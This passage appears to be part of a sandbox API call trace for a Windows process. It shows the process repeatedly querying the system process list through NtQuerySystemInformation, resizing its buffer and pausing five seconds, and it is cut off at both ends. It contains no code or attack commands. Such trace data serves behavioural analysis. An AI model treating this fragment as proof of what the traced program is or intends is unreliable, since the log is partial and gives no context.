SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0108.769] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0108.769] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0108.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0108.784] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0108.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0108.799] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0108.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0108.814] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.827] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0108.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0108.831] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0108.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0108.845] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0108.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0108.861] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0108.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0108.876] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0108.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0108.908] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0108.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0108.923] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0108.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0108.942] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0108.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0108.955] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0108.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0108.973] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0108.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0108.988] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0108.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0108.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0108.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0108.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0108.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.001] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.019] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.033] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.049] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.060] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.061] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.067] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.076] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.079] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.091] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0109.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0109.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0109.100] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0109.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0109.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0109.107] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0109.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, 